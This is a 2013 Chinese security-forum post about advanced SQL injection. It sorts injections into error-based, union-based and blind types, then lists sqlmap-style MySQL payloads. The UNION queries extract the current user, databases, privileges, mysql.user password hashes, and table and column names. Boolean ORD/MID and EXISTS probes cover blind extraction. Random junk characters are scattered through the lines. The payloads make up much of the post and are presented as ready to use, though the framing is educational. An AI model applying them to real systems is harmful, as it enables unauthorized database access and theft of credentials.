放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。 `' |4 g ~3 H- }( e) n/ O3 z: ^
8 v2 v: [5 T' J2 }这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表9 C+ F4 C% i- E, I! O
8 _) p' l! l+ I# U9 b0 N8 z分类标准 分类 备注 B) @0 |' I$ x, T
按字段类型 整型注入,字符型注入 & M6 v/ M& a% Y7 `" ]3 E9 i, ]
按出现的位置 get注入,post注入,cookie注入,http header注入 I/ r- X4 v0 S& a7 u
然而高级注入是这样的
& u' K6 q2 V" K- r
/ L$ ~4 f$ X' y2 Y$ W) l6 W3 N高级注入分类 条件5 ~& H) N+ [" x# Q
error-based sql 数据库的错误回显可以返回,存在数据库,表结构& `. U0 T! {" h3 U3 o
union-based sql 能够使用union,存在数据库,表结构
9 ~9 ]: w8 | b0 ^1 m3 ablind sql 存在注入
9 H! i) ]8 q8 \. Y我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
% ?+ }+ C9 }+ \* B3 C8 Y( M. o. T A
( ]( x7 s" o) M' F好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火" w u$ L7 Y5 E9 ?! ^
/ ^! I# J2 G* \2 l" T
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。9 d* H% W) |$ | W
, g5 x% O9 ?# A3 k这里用mysql说明
9 A8 ~5 ^3 ]1 c6 `' V) D ' G4 q' n! Z8 m2 G; |9 Q: z
e注入坛子里很多了,请看戳我或者再戳我
9 F7 n- |0 t A4 L& S7 v: E( b* l
; k' g: O: T) I' uu注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
% |$ o& |* h- B 5 ~0 X- k- Q, U* r
获取当前数据库用户名6 x: R, ~( ]3 s6 e
" L8 X9 P5 f0 u! V! a( EUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
" P0 q( i1 @0 E8 I+ t8 l% y0 B2 J& gAST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
/ {1 @3 g0 E: sL, NULL#
- `) `/ u3 _9 F7 b; E注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
. I5 _! Y6 l* k3 O& F * S6 V6 h0 f. T/ N9 Z _
获取数据库名9 a5 K, @' \/ s
2 T. E8 s5 |+ tUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#- \) Z& Z& M8 M' p8 T- z
获取所有用户名9 Y) `0 Z5 a4 w6 ^- C* p
; @3 }+ ]' ?2 {$ ]7 r2 w
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#4 a! A; O; s4 S# ^& g; a" s3 u
查看当前用户权限
c# J6 d# g. T, M
( q& Y+ f, }/ T. q6 GUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
; v4 O( G0 Z2 t/ z$ ]0 S尝试获取密码,当然需要有能读mysql数据库的权限
1 D9 Q( I" ~) M, X2 {7 X- N, {
+ s p, o# r# A0 D4 x& H6 A2 G k' f7 LUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
% M! _( o2 R6 @) D5 {获取表名,limit什么的自己搞啦
0 \, Q: W1 G$ t, T! Q
5 p. O g" k# K/ I8 Y3 fUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#: |/ T: B& I+ v" @8 F) N7 q* E
获取字段名及其类型0 Q# X& s" s& k0 S
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
# V- W3 f' ^$ L0 l3 @
% \" g+ O3 u6 L1 M! q% Jb注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
$ R8 x+ [9 P3 t0 I2 B$ p ; V& f; C! e5 D. c
如:
' j5 @/ c5 I+ ^* S# m获取当前用户名 z" {& E! C0 J, Q$ }
/ e. [9 t6 F- k/ L# A; P7 kAND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
7 G S/ Z; b7 `9 f. h% a获取当前数据库
: e* N! e& T( A2 q. t l ; B Z# s# F" B& o A3 A
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
1 W5 S' |% t6 \+ G3 d& h获取表名
$ o4 X7 H- a4 t7 B( R. e3 P
& q( d0 n9 `3 J. j% }1 i- WAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
3 x6 B4 I' n" U; B& U获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
: L% c, [2 p8 R3 _4 ` P回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。! F. N( y: R% R# e: @
爆表
$ d$ D2 M4 e" q# s7 W6 Y
7 Y" Y4 M3 c& Y0 `AND EXISTS(select * from table)
. |9 u; g. }$ W0 K爆字段 {7 d2 `& A" `& c
$ e" P9 q9 g \3 A- d5 A) LAND EXISTS(select pwd from table)5 a% H! w9 F3 u8 q1 D* Z$ a" g' v
盲注的变化就比较多了,由于篇幅,只是举个例子而已。. |0 p# z5 \4 }5 G' k
) d+ {* `3 Z( g
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。8 D4 l! _* x7 |# R5 B6 j, c
|
发表于 2013-7-16 20:31:26
收藏
支持
反对